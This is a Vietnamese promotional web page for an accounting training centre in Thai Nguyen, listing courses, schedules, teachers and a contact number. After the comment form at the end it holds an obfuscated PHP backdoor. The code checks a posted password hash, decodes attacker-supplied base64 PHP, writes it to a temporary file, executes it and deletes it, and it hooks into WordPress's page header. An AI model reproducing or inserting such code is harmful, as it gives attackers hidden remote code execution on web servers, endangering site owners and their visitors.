1

Trung tâm dạy kế toán thực hành tốt nhất ở Thái Nguyên

KHÓA HỌC KẾ TOÁN KÈM RIÊNG THEO YÊU CẦU 1-1 xem ngay

KHÓA HỌC KẾ TOÁN NỘI BỘ CẤP TỐC ONLINE xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

ĐỊA CHỈ LỚP HỌC KẾ TOÁN TẠI THÁI NGUYÊN

Tại Thái Nguyên việc học kế toán thực hành thực tế hiện nay đang là nhu cầu thực sự cấp thiết. Bởi lẽ các công ty, doanh nghiệp, việc tuyển dụng thường ưu ái tuyển những bạn trẻ đã có kinh nghiệm thực tế chứng từ và đã được đào tạo khóa kế toán thực hành. Điều này gây rất nhiều khó khăn cho các sinh viên mới ra trường chưa có kinh nghiệm.

Hầu hết muốn trở thành kế toán giỏi, yêu cầu bạn phải có những  điều kiện thiết yếu về kiến thức cũng như kĩ năng nghề nghiệp, có được điều này bắt buộc phải được đào tạo một cách bài bản, nhận thấy tầm quan trọng này. Địa chỉ học kế toán tại Thái Nguyên( trực thuộc bởi Kế toán Hà Nội) đã liên tục mở các lớp đào tạo chuyên sâu kế toán cho những bạn có nhu cầu muốn học tập và lĩnh hội kinh nghiệm. Nếu bạn đang ở Thái Nguyên và còn đang trăn trở thì hãy thử đến ngay lớp học kế toán tại Thái Nguyên để nhận được những ưu đãi lớn.

Địa chỉ học kế toán Tại Thái Nguyên

Với mục tiêu đưa cam kết chuẩn đầu ra cho học viên, chính vì thế mà địa chỉ học kế toán tại Thái Nguyên cam kết giúp bạn đạt được những mục tiêu sau.

 • Học cách mở tài khoản ngân hàng và mua chữ ký số nộp tờ khai cho DN
 • Được hướng dẫn chi tiết cách lập tờ khai lệ phí môn bài trên phần mềm HTKK của Tổng Cục thuế; Cách viết giấy nộp lệ phí môn bài nộp qua mạng và cách điền các chỉ tiêu vào giấy nộp tiền điện tử cho Cơ Quan thuế.
 • Học hỏi nhận biết hóa đơn GTGT hợp lý- hợp lệ- hợp pháp (cách tra cứu 1 hóa đơn, nhiều hóa đơn trên trang Tổng cục thuế để phát hiện hóa đơn đó có hợp pháp hay không? ; Cách viết hóa đơn ; Cách xử lý nếu viết hóa đơn sai….
 • Cách lập tờ khai thuế GTGT trên phần mềm HTKK hàng tháng, quý (cách cân đối hóa đơn đầu vào, đầu ra hợp lý) và cách kê khai điều chỉnh tờ khai khi bị kê khai sai.
 • Cách kê khai và quyết toán thuế TNCN : lập tờ khai hàng tháng, quý và cuối năm làm Quyết toán.
 • Cách kê khai và quyết toán thuế TNDN : Tính xem hàng quý DN có bị nộp thuế TNDN không (kiểm tra các khoản chi phí được trừ hay không được trừ khi tính thuế? cách nộp tiền thuế TNDN điện tử và cuối năm làm quyết toán thuế TNDN.

Nội dung của khóa học kế toán tại Thái Nguyên.

 • Quy trình thủ tục mua hoá đơn, đặt in hoá đơn
 • Nắm bắt thành thục cách tính thuế, kê khai thuế (Báo cáo thuế tháng, quý, năm)
 • Học Nhập môn kế toán (Nguyên lý kế toán)
 • Thực hành trực tiếp hạch toán thực tế vào sổ sách, lập báo cáo tài chính
 • Học cách thủ thuật kế toán, thủ thuật cân đối lãi lỗ cho doanh nghiệp

Điều kiện cơ sở vật chất và chất lượng giáo viên của lớp học kế toán tại Thái Nguyên

Về chất lượng giáo viên: Đều là những người đã hoạt động trong nghành kế toán lâu năm với trên 10 năm kinh nghiệm. Họ đã và đang làm kế toán trưởng của nhiều doanh nghiệp lớn, nhỏ trên địa bàn toàn quốc. Với sự hiểu biết cũng như năng lực của họ chắc chắn sẽ giúp bạn học hỏi được nhiều bài học tốt. Hơn nữa trong quá trình lên lớp, nếu học viên chưa hiểu thì giáo viên sẽ có trách nhiệm giảng lại và kèm cặp sâu kĩ các bài học lí thuyết cũng như thực hành.

Cở sở lớp học: Phòng học  khá rộng rãi, cách âm, thoáng mát. Lớp học kế toán tổng hợp ở Thái Nguyên chú trọng chất lượng nên mỗi lớp học viên không quá tối đa 15 người. Hệ thống máy chiếu, màn hình, điều hòa luôn sẵn sàng chào đón học viên.

Tài liệu học tập: được phát miễn phí, có đủ các bộ tư liệu và số liệu liên quan các chuyên ngành kế toán. Học viên được thực hành trực tiếp trên máy tính, trên các phần mềm kế toán, trên Exel.

Giờ học thoải mái, học viên có thể tự chọn lịch học cho mình, Địa chỉ học kế toán tại Thái Nguyên sẽ tạo điều kiện cho quý học viên

 • Sáng từ 8h30-11h;
 • Chiều từ 14h-16h30;
 • Tối từ 18h-20h30.
 • Học vào thứ 2, 4, 6 hoặc bạn có thể học vào thứ 3, 5, 7. Có thể học cả thứ 7 và chủ nhật. Học ngay sau khi đăng kí

Liên hệ Mr Ngọc 0973.761.751 (Zalo) để nhận ngay hỗ trợ tư vấn

Ưu điểm của từng khóa học kế toán tại Thái Nguyên

 • Đóng một lần học phí với số buổi học không giới hạn. Học đến khi hiểu và thành thạo
 • Hỗ trợ các nghiệp vụ kế toán, thuế, qua hệ thống video giải đáp các tình huống thuế và kế toán.
 • Tham gia miễn phí các buổi hội thảo, tập huấn về kế toán – tài chính khi có chính sách thuế mới do Phó vụ Trưởng Tổng Cục Thuế giảng dạy.
 • Hỗ trợ xây dựng, thiết lập hệ thống sổ sách khi vào làm tại doanh nghiệp.
 • Hỗ trợ học viên thực tập tại phòng dịch vụ kế toán thuế của công ty, đang làm cho hơn 600 doanh nghiệp.
 • Trung tâm đào tạo kế toánhỗ trợ tư vấn và giới thiệu việc làm miễn phí.
 • Được tặng phần mềm kế toán Misa có bản quyền, sử dụng vĩnh viễn và hoàn toàn miễn phí.
 • Cấp giấy chứng nhận sau khi hoàn thành xong khóa học.

Địa chỉ học kế toán tại Thái Nguyên:

 Đường Hoàng Văn Thụ – phường Hoàng Văn Thụ – TP. Thái Nguyên

LỚP TIN HỌC VĂN PHÒNG CƠ BẢNxem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁNxem ngay

KHÓA HỌC KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆPxem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Leave a Reply

  Your email address will not be published. Required fields are marked *

  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}